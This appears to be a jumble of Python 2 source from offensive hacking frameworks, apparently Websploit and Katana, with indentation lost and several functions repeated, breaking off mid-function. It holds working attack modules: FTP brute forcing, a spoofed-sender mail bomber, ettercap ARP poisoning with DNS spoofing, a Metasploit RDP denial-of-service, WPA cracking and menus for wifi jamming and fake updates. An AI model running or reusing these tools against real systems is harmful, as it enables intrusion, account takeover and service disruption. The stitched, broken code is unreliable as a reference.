line_3 = wcolors.color.GREEN + "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..." + wcolors.color.ENDC
press_ak = raw_input(line_3)
os.system('killall tcpkill')
print (wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Stoped." + wcolors.color.ENDC)
else:
print "Wrong Command => ", com
webkiller()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
def hostl(run):
global defaultnet,defaulttyp
try:
if run!=1:
actions=raw_input(d.prompt("net/lanlive"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("nets","yes","Local area net",defaultnet)
#d.descrip("type","no","type scan",defaulttyp)
d.helpAUX()
if ping.conneted()!=False:
print " You IP : ",ping.myip()
else:
print d.noconnect()
#print " Type : {fast}{intense}"
d.space()
hostl(0)
elif actions[0:8] == "set nets":
defaultnet=ping.update(defaultnet,actions,"nets")
d.change("nets",defaultnet)
elif actions[0:8] == "set type":
defaulttyp=ping.update(defaulttyp,actions,"type")
d.change("type",defaulttyp)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
d.space()
ping.lan_ips(1)
d.space()
except:
Errors.Errors(event=sys.exc_info(), info=False)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
hostl(0)
def xjoomla(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/joomscan"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
xjoomla(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
subprocess.call(
'cd /usr/share/joomscan/;./joomscan.pl -u ' +
defaulthost,
shell=True)
except (KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
xjoomla(0)
def services(process):
try:
actions = raw_input(O+" ktn/server/"+process+" > "+W)
if actions == "show options":
print ""
print ""
print " ["+G+"!"+W+"] Not Options enables."
print ""
print ""
services(process)
elif actions=="exit":
print C+" GooD"+W+" bye."
return
return
elif actions == "help":
help.help()
elif actions == "run":
print ""
try:
if True:
print(" ["+G+"+"+W+"] Running")
try:
print(" ["+O+"!"+W+"] Starting Service "+process)
subprocess.call('service '+process+' start > nul', shell=True)
print(" ["+G+"+"+W+"] Service started")
print ""
raw_input(" ["+O+"!"+W+"] Press any key for Stop Service")
print(" ["+O+"!"+W+"] Stopping Service "+process)
subprocess.call('service '+process+' stop > nul ', shell=True)
print(" ["+G+"+"+W+"] Service Stoped")
print ""
except(KeyboardInterrupt):
print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit")
except:
print(" ["+R+"-"+W+"] target off")
elif actions=="back":
return
else:
print " ["+O+"!"+W+"] command No Accept"+W
except(KeyboardInterrupt):
print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit")
exit()
services(process)
def xjoomla(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/joomscan"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
xjoomla(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
subprocess.call("cd /usr/share/joomscan/;./joomscan.pl -u " + defaulthost, shell=True)
except (KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
xjoomla(0)
def rdpexploit():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "exploit/remote_desktop" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:10] == 'set target':
target_ip = com[11:40]
options[0] = target_ip
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Target" + wcolors.color.RED + "]>> " + options[
0]
rdpexploit()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "TARGET\t\t" + options[0] + "\t\tyes\tTarget IP Address"
rdpexploit()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
rdpexploit()
elif com[0:4] == 'help':
help.help()
rdpexploit()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
rdpexploit()
elif com[0:3] == 'run':
log.logger.attack("Attacking")
subprocess.Popen(
'msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; set RHOST %s; set RPORT 3389; exploit; exit"'
% options[0],
shell=True).wait()
rdpexploit()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>>" + com
rdpexploit()
except (KeyboardInterrupt):
print ""
def main():
try:
line_1 = intname
terminal = input(line_1)
if terminal[0:4] == 'help':
help.help()
main()
elif terminal[0:4] == 'show':
print("\nAvailable Payloads: \n")
for d in glob.iglob('payloads/*'):
f = d.replace("payloads\\", "")
print(f)
main()
elif terminal[0:7] == 'execute':
setpayload = setpl()
os.system("%s --run payloads\%s" % (micronucleus, setpayload))
print("Completed Installation!")
main()
except KeyboardInterrupt:
exit()
def btftp(run):
try:
global defaulthost, defaultport, defaultuser, defaultdicc
if run != 1:
actions = raw_input(d.prompt("bt/ftp"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
d.space()
btftp(0)
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdicc = ping.update(defaultdicc, actions, "dict_1")
d.change("dict_1", defaultdicc)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ftp = FTP(defaulthost)
if True:
try:
d.loading_file()
try:
with open(defaultdicc, 'r') as passs:
for ps in passs:
ps = ps.replace("\n", "")
try:
ftp.login(defaultuser, ps)
if True:
ping.save("BruteForceFTP",
defaulthost, defaultport,
defaultuser, ps)
d.Success(defaultuser, ps)
return 1
except:
print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
btftp(0)
def smtpbombing(run):
global defaulthost, defaultport, defaultfrom, defaultdest, defaultsubj, defaulttemp, defaultmany
try:
if run != 1:
actions = raw_input(d.prompt("set/mailboom"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("host", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port ", defaultport)
d.descrip("target", "yes", "E-mail target", defaultdest)
d.descrip("from", "yes", "E-mail fake", defaultfrom)
d.descrip("subjet", "yes", "Subject fake", defaultsubj)
d.descrip("tempte", "yes", "Template", defaulttemp)
d.descrip("many", "no", "Amount to send", defaultmany)
print ""
smtpbombing(0)
elif actions[0:8] == "set host":
defaulthost = ping.update(defaulthost, actions, "host")
d.change("host", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:10] == "set target":
defaultdest = actions[11:]
d.change("target", defaultdest)
smtpbombing(0)
elif actions[0:8] == "set from":
defaultfrom = actions[9:]
d.change("from", defaultfrom)
smtpbombing(0)
elif actions[0:10] == "set subjet":
defaultsubj = actions[11:]
d.change("subjet", defaultsubj)
smtpbombing(0)
elif actions[0:10] == "set tempte":
defaulttemp = actions[11:]
d.change("tempte", defaulttemp)
smtpbombing(0)
elif actions[0:8] == "set many":
defaultmany = actions[9:]
d.change("tempte", defaultmany)
smtpbombing(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
i = int(defaultmany)
try:
with open(defaulttemp, 'r') as body:
try:
smtp = smtplib.SMTP(defaulthost, defaultport)
while 0 < i:
i -= 1
try:
smtp.sendmail(defaultfrom, defaultdest, body)
if True:
print " " + Suf + " (" + str(
i) + ")E-Mail was sent."
except:
print " " + Bad + " (" + str(
i) + ")E-mail not was sent."
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulttemp)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
smtpbombing(0)
def main():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += " > "
terminal = raw_input(line_1)
if terminal[0:3] == 'use':
if terminal[4:20] == 'web/apache_users':
apache_users.apache_users()
main()
if terminal[4:27] == 'web/cloudflare_resolver':
cloudflare_resolver.cloudflare_resolver()
main()
elif terminal[4:20] == 'network/arp_dos':
arp_dos.arp_dos()
main()
elif terminal[4:20] == 'exploit/autopwn':
autopwn.autopwn()
main()
elif terminal[4:27] == 'exploit/browser_autopwn':
brow_autopwn.brow_autopwn()
main()
elif terminal[4:19] == 'web/dir_scanner':
directory_scanner.directory_scanner()
main()
elif terminal[4:12] == 'web/wmap':
wmap.wmap()
main()
elif terminal[4:11] == 'web/pma':
phpmyadmin.phpmyadmin()
main()
elif terminal[4:23] == 'exploit/java_applet':
java_applet.java_applet()
main()
elif terminal[4:16] == 'network/mfod':
mfod.mfod()
main()
elif terminal[4:16] == 'network/mitm':
mitm.mitm()
main()
elif terminal[4:17] == 'network/mlitm':
mlitm.mlitm()
main()
elif terminal[4:21] == 'network/webkiller':
webkiller.webkiller()
main()
elif terminal[4:24] == 'network/arp_poisoner':
arp_poisoner.arp_poisoner()
main()
elif terminal[4:22] == 'network/fakeupdate':
fakeupdate.fakeupdate()
main()
elif terminal[4:20] == 'wifi/wifi_jammer':
wifi_jammer.wifi_jammer()
main()
elif terminal[4:17] == 'wifi/wifi_dos':
wifi_dos.wifi_dos()
main()
elif terminal[4:22] == 'wifi/wifi_honeypot':
wifi_honeypot.wifi_honeypot()
main()
elif terminal[4:20] == 'wifi/mass_deauth':
mass_deauth.mass_deauth()
main()
elif terminal[4:27] == 'bluetooth/bluetooth_pod':
bluetooth_pod.bluetooth_pod()
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] == 'help':
help.help()
main()
elif terminal[0:2] == 'os':
os.system(terminal[3:])
main()
elif terminal[0:7] == 'upgrade':
upgrade.upgrade()
main()
elif terminal[0:6] == 'update':
update.update()
elif terminal[0:5] == 'about':
about.about()
main()
elif terminal[0:4] == 'exit':
exit()
else:
print "Wrong Command => ", terminal
main()
except (KeyboardInterrupt):
print(wcolors.color.RED +
"\n[*] (Ctrl + C ) Detected, Trying To Exit ..." +
wcolors.color.ENDC)
print(wcolors.color.YELLOW +
"[*] Thank You For Using Websploit Framework =)" +
wcolors.color.ENDC)
def cmysql(run):
global defaulthost, defaultport, defaultuser, defaultpass
try:
if run != 1:
actions = raw_input(d.prompt("clt/sql"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("pass", "yes", "Password", defaultpass)
print ""
cmysql(0)
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target", defaulthost)
cmysql(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port", defaultport)
cmysql(0)
elif actions[0:8] == "set user":
defaultuser = actions[9:]
d.change("user", defaultuser)
cmysql(0)
elif actions[0:8] == "set pass":
defaultpass = actions[9:]
d.change("pass", defaultpass)
cmysql(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
con = MySQLdb.connect(defaulthost, defaultuser,
defaultpass, "")
if True:
try:
cmd = "nop"
print "\n " + Hlp + " SQL Client help\n"
print " -------------------------------------------------------------------------------------------------------"
print " |" + colors[6] + "Commd" + colors[
0] + " | " + colors[
6] + "Description" + colors[
0] + " | " + colors[
6] + "Examples" + colors[
0] + " |"
print " -------------------------------------------------------------------------------------------------------"
print " |show databases | list databases | show databases |"
print " |use | select database | use user_table |"
print " |show tables | list tables | show tables |"
print " |create database | create databases| create database USERS | "
print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
print " |drop database | drop databases | drop database USERS | "
print " |drop table | drop tables | drop table EMAIL | "
print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
print " |update | update data | update EMAILS set name='Willy' where id=1 | "
print " |select | select data | select id, name from EMAILS | "
print " -------------------------------------------------------------------------------------------------------"
print ""
while (cmd != "exit"):
cmd = raw_input(colors[1] + " CLT~" +
colors[3] + "sql/> " +
colors[0])
cur = con.cursor()
try:
tor = cur.execute(cmd)
if True:
for x in range(tor):
print cur.fetchone()
except:
print " [" + colors[1] + "-" + colors[
0] + "] Error: command"
except (KeyboardInterrupt):
d.kbi()
except Exception, e:
print(
" [" + colors[1] + "-" + colors[0] +
"] Timeout.", e)
except:
d.nomatch()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
cmysql(0)
def Gendic(run):
try:
global defaultdic,defaultlon,defaultstr
if run!=1:
actions=raw_input(d.prompt("mc/gendic"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("path","yes","Output file",defaultdic)
d.descrip("long","yes","Longitude",defaultlon)
d.descrip("type","yes","Type matrix",defaultstr)
d.helpAUX()
print " "+colors[7]+"Type Description"+colors[0]
print " chars_min = [a,b,c,...,z]"
print " chars_may = [A,B,C,...,Z]"
print " chars_num = [0,1,2,...,9]"
print " chars_mix = [a,b,...,0,1]"
d.space()
Gendic(0)
elif actions[0:8] == "set path":
defaultdic=ping.update(defaultdic,actions,"path")
d.change("path",defaultdic)
elif actions[0:8] == "set long":
defaultlon=ping.update(defaultstr,actions,"long")
d.change("long",defaultlon)
elif actions[0:8] == "set type":
defaultstr = actions[9:]
if defaultstr != "chars_min" and defaultstr != "chars_may" and defaultstr != "chars_num" and defaultstr != "chars_mix":
print " "+Alr+" Error to set type, use chars_min, chars_mix, chars_may or chars_num"
defaultstr="chars_num"
Gendic(0)
else:
defaultstr=defaultstr
d.change("type",defaultstr)
Gendic(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
Maxima=1
long_max = long(defaultlon)
long_min = long(defaultlon)
char_null = ['']
chars_min = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
chars_may = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
chars_num = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
chars_spe = ['.', '-', '_', '/', '@']
permitidos = []
permitidos += char_null
if defaultstr == "chars_num":
permitidos += chars_num
if defaultstr == "chars_may":
permitidos += chars_may
if defaultstr == "chars_min":
permitidos += chars_min
if defaultstr == "chars_mix":
permitidos +=chars_min
permitidos +=chars_num
total_chars = len(permitidos)
char_n_max = total_chars - 1
cadena = []
for chars in range(0, long_max):
cadena += [0]
for i in range (1, long_min+1):
cadena[-(i)] = 1
cadena_max = []
for chars in range(0, long_max):
cadena_max += [ total_chars -1 ]
def toClave(cadena1):
password = ""
for indice in cadena1:
password += permitidos[indice]
return password
def isMax(cadena1):
if toClave(cadena1) != toClave(cadena_max):
return False
return True
def aumentarCadena(cadena1):
unidad = 1
acarreo = 0
for digito in range(1,long_max +1):
if cadena[-(digito)] < char_n_max:
if unidad == 1:
cadena[-(digito)] += 1
unidad = 0
return cadena1
elif acarreo == 1:
cadena[-(digito)] += 1
acarreo = 0
return cadena1
else:
cadena[-(digito)] = 1
acarreo = 1
return cadena1
for number_total in cadena_max:
Maxima=Maxima*number_total
procent=int(Maxima)/10
counter=0
porcent=0
print " "+Alr+" Creating file... ",ping.status_cmd("echo >"+defaultdic, "\t\t\t")
print " "+Alr+" Generating... ["+str(Maxima)+"] Words to Generate "+str(porcent)+"% Complete"
fichero = open(defaultdic, 'w')
bucle = True
while bucle:
password = toClave(cadena)
fichero.write(password + '\n')
counter=counter+1
if procent == counter:
procent=procent+procent
porcent=porcent+20
print " "+War+" "+str(porcent)+"% Porcent Complete"
if isMax(cadena):
porcent=porcent+20
print " "+War+" "+str(porcent)+"% Porcent Complete"
bucle = False
cadena = aumentarCadena(cadena)
print(" "+Suf+" Completed, output file in "+defaultdic)
d.space()
fichero.close()
except:
Errors.Errors(event=sys.exc_info(), info=False)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=False)
Gendic(0)
def smtpbombing(run):
global defaulthost,defaultport,defaultfrom,defaultdest,defaultsubj,defaulttemp,defaultmany
try:
if run!=1:
actions=raw_input(d.prompt("set/mailboom"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("host","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port ",defaultport)
d.descrip("target","yes","E-mail target",defaultdest)
d.descrip("from","yes","E-mail fake",defaultfrom)
d.descrip("subjet","yes","Subject fake",defaultsubj)
d.descrip("tempte","yes","Template",defaulttemp)
d.descrip("many","no","Amount to send",defaultmany)
print ""
smtpbombing(0)
elif actions[0:8] == "set host":
defaulthost=ping.update(defaulthost,actions,"host")
d.change("host",defaulthost)
elif actions[0:8] == "set port":
defaultport=ping.update(defaultport,actions,"port")
d.change("port",defaultport)
elif actions[0:10] == "set target":
defaultdest = actions[11:]
d.change("target",defaultdest)
smtpbombing(0)
elif actions[0:8] == "set from":
defaultfrom = actions[9:]
d.change("from",defaultfrom)
smtpbombing(0)
elif actions[0:10] == "set subjet":
defaultsubj = actions[11:]
d.change("subjet",defaultsubj)
smtpbombing(0)
elif actions[0:10] == "set tempte":
defaulttemp = actions[11:]
d.change("tempte",defaulttemp)
smtpbombing(0)
elif actions[0:8] == "set many":
defaultmany = actions[9:]
d.change("tempte",defaultmany)
smtpbombing(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
i=int(defaultmany)
try:
with open(defaulttemp,'r') as body:
try:
smtp = smtplib.SMTP(defaulthost, defaultport)
while 0 < i:
i-=1
try:
smtp.sendmail(defaultfrom, defaultdest, body)
if True:
print " "+Suf+" ("+str(i)+")E-Mail was sent."
except:
print " "+Bad+" ("+str(i)+")E-mail not was sent."
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulttemp)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
smtpbombing(0)
def mfod():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "MFOD" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == 'set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
mfod()
elif com[0:11] == 'set redhost':
options[1] = com[12:27]
print "REDHOST => ", options[1]
mfod()
elif com[0:10] == 'set domain':
options[2] = com[11:19]
print "DOMAIN => ", options[2]
mfod()
elif com[0:12] == 'show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "Interface\t" + options[
0] + "\t\t\tyes\tNetwork Interface Name"
print "REDHOST\t\t" + options[
1] + "\t\tyes\tIP Address Of Any Host For Redirect Victim"
print "DOMAIN\t\t" + options[
2] + "\t\t\tyes\tType Of Domain (ex:.com)"
print ""
mfod()
elif com[0:2] == 'os':
os.system(com[3:])
mfod()
elif com[0:4] == 'help':
help.help()
mfod()
elif com[0:4] == 'back':
pass
elif com[0:3] == 'run':
sleep(2)
subprocess.Popen('/etc/init.d/apache2 start',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
try:
os.chdir('/usr/local/share/ettercap')
check_dir = os.listdir(os.curdir)
if 'etter.dns' in check_dir:
os.system(
'mv /usr/local/share/ettercap/etter.dns etter.dns.old')
my_etter = open('etter.dns', 'w')
my_etter.write('*' + options[2] + '\tA' + '\t' + options[1])
my_etter.close()
except (OSError):
print(wcolors.color.RED + wcolors.color.BOLD +
"[*]Checking Ettercap ... Please Wait ..." +
wcolors.color.ENDC)
try:
os.chdir('/usr/share/ettercap')
check_dir = os.listdir(os.curdir)
if 'etter.dns' in check_dir:
os.system('mv /usr/share/ettercap/etter.dns etter.dns.old')
my_etter = open('etter.dns', 'w')
my_etter.write('*' + options[2] + '\tA' + '\t' + options[1])
my_etter.close()
except (OSError):
print(wcolors.color.RED + wcolors.color.BOLD +
"[*]Checking Ettercap ... Please Wait ..." +
wcolors.color.ENDC)
print(wcolors.color.BOLD + wcolors.color.BLUE +
"[*]DNS Spoofing Starting ..." + wcolors.color.ENDC)
dns_spoofing = 'ettercap -Tqi ' + options[
0] + ' -M arp // // -P dns_spoof'
subprocess.Popen(dns_spoofing,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
print(wcolors.color.BOLD + wcolors.color.BLUE +
"[*]MFOD Attack Has Been Started." + wcolors.color.ENDC)
print(
wcolors.color.BOLD + wcolors.color.RED +
"[*]Notice : After Attack Press [ENTER] For Cleanup [tmp] File's"
+ wcolors.color.ENDC)
line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_4 += ":"
line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "MFOD" + wcolors.color.ENDC
line_4 += " > After Your Attack Finished Press [Enter] For Cleanup : "
cln_enter = raw_input(line_4)
print(
wcolors.color.YELLOW +
"[*]Cleaning [tmp] File's For Next Attack , Please Wait ..." +
wcolors.color.ENDC)
sleep(2)
os.system('rm -rf /usr/local/share/ettercap/etter.dns')
os.system('rm -rf /usr/share/ettercap/etter.dns')
os.system('killall ettercap')
print(wcolors.color.GREEN + "Cleanup Successfully." +
wcolors.color.ENDC)
else:
print "Wrong Command => ", com
except (KeyboardInterrupt, OSError):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" +
wcolors.color.ENDC)
def katanaFrameworkMainFunction():
try:
action = raw_input(colors.GR+" KTF>"+colors.W)
if action == "show modules" or action == "showm":
print """
,--.-,
/BY/ / """+colors.GR+""" Module Description """+colors.W+"""
"""+colors.W+"""|"""+colors.R+"""=="""+colors.W+"""|::| web/httpbt"""+colors.W+"""\t\tBrute force to HTTP 401"""+colors.W
for module in root.findall('module'):
name = module.get('name')
description = module.find('description').text
Line(name,description)
print """ /RT/, /
`--`-' \n"""
katanaFrameworkMainFunction()
elif action[0:3] == "use":
# WEB : Web Tools
if action[4:14] == "web/httpbt":
BruteForceHTTP.httpbt(0)
if action[4:16] == "web/cpfinder":
AdminFinder.adminfinder(0)
if action[4:16] == "web/formbt":
BruteForceFormBase.httpformbasebruteforce(0)
if action[4:17] == "web/joomscan":
Joomscan.xjoomla(0)
if action[4:11] == "web/dos":
dosweb.dosweb(0)
if action[4:13] == "web/whois":
Whois.wuis(0)
if action[4:15] == "web/lfd-con":
LFDconsole.LFDconsole(0)
# NET : Networks Tools
if action[4:16] == "net/arplook":
ARPLooking.arplook(0)
if action[4:15] == "net/lanlive":
LANScanner.hostl(0)
if action[4:16] == "net/arpspoof":
ARPPoisoning.arpp(0)
if action[4:16] == "net/portscan":
PortScanner.PortScanner(0)
# SET : Social Enginnering tools
if action[4:17] == "set/gdreport":
GetDataReport.getdatareport(0)
if action[4:16] == "set/mailboom":
smtpBombing.smtpbombing(0)
if action[4:16] == "set/facebrok":
facebrok.facebrok(0)
# FLE : Files Tools
if action[4:17] == "fle/brutezip":
BruteZIP.btzip(0)
if action[4:17] == "fle/bruterar":
BruteRAR.btrar(0)
# CLT : Clients Console Tools
if action[4:11] == "clt/ftp":
ClientFTP.cftp(0)
if action[4:12] == "clt/pop3":
ClientPOP3.cpop3(0)
if action[4:11] == "clt/sql":
ClientMYSQL.cmysql(0)
# FBT : Force Brute Tools
if action[4:11] == "fbt/ftp":
BruteForceFTP.btftp(0)
if action[4:11] == "fbt/ssh":
BruteForceSSH.btssh(0)
if action[4:11] == "fbt/sql":
BruteForceSQL.btsql(0)
if action[4:12] == "fbt/pop3":
BruteForcePOP3.btpop3(0)
# SER : Services Tools
if action[4:14] == "ser/sql":
services.services('mysql')
if action[4:14] == "ser/ssh":
services.services('ssh')
if action[4:18] == "ser/apache":
services.services('apache2')
# WIFI : Wifi Tools
if action[4:15] == "wifi/wpabtf":
WpaBTF.wpabtf(0)
if action[4:12] == "wifi/dos":
Wifi_DDOS.ddos(0)
# MC : MICCESELANIUS
if action[4:13] == "mc/tlogin":
TLogin.tlogin(0)
if action[4:13] == "mc/gendic":
GenDic.Gendic(0)
if action[4:8] == "mc/i":
Iandl.iandi()
# FZZ : Fuzzing Tools
if action[4:11] == "fzz/ftp":
FuzzerFTP.fftp()
# FOR : Forence Tools
if action[4:13] == "for/image":
forenseIMAGE.exiftool(0)
exit()
else:
katanaFrameworkMainFunction()
elif action == "exit" or action == "x":
exit()
elif action == "help" or action == "h":
help.help()
katanaFrameworkMainFunction()
elif action == "update" or action == "u":
updatekatana.update()
elif action == "clear" or action == "c":
subprocess.call('clear', shell=True)
katanaFrameworkMainFunction()
else:
print " ["+colors.R+"!"+colors.W+"] Invalid parameter use show 'help' for more information"+colors.W
katanaFrameworkMainFunction()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
def wpabtf():
global defaultdic,defaultcap,defaultmac
actions = raw_input(O+" ktn/wifi/wpabtf > "+W)
if actions == "show options":
print ""
print " ["+R+"+"+W+"] options"
print " |File Capture : yes"
print " |Mac Target : yes"
print " |Dictionary : yes/no\n"
print ""
print " ["+G+"+"+W+"] options current"
print " |cap : ",defaultcap
print " |mac : ",defaultmac
print " |dictionary : ",defaultdic
print ""
elif actions=="back":
pass
elif actions=="exit":
print C+" GooD"+W+" bye."
exit()
elif actions[0:7] == "set cap":
defaultcap = actions[8:]
print " Capture : "+defaultcap+" "+O+" Saved!!!"+W
wpabtf()
elif actions[0:14] == "set dictionary":
defaultdic = actions[15:]
print " Dictionary : "+defaultdic+" "+O+" Saved!!!"+W
wpabtf()
elif actions[0:7] == "set mac":
defaultmac = actions[8:]
print " Mac Target : "+defaultmac+" "+O+" Saved!!!"+W
wpabtf()
elif actions == "help":
help.help()
elif actions == "run":
try:
print ""
print " ["+G+"+"+W+"] options current"
print " Capture : ",defaultcap
print " Mac Target : ",defaultmac
print " Dictionary : ",defaultdic
print ""
try:
Arch=open(defaultdic,'r')
if True:
try:
Arch=open(defaultcap,'r')
if True:
try:
subprocess.call('aircrack-ng -w '+defaultdic+' -b '+defaultmac+' '+defaultcap+'', shell=True)
print""
except(KeyboardInterrupt, SystemExit):
print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit")
except:
print " ["+O+"!"+W+"] Error to open Capture"
except:
print " ["+O+"!"+W+"] Error to open Dictionary"
except(KeyboardInterrupt, SystemExit):
print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit")
else:
print " ["+O+"!"+W+"] command No Accept"+W
wpabtf()
def btpop3(run):
try:
global defaulthost,defaultport,defaultdicc,defaultaccount
if run!=1:
actions=raw_input(d.prompt("bt/pop3"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("email","yes","Account ",defaultaccount)
d.descrip("dict_1","yes","Dictionary pass",defaultdicc)
print ""
btpop3(0)
elif actions[0:10] == "set target":
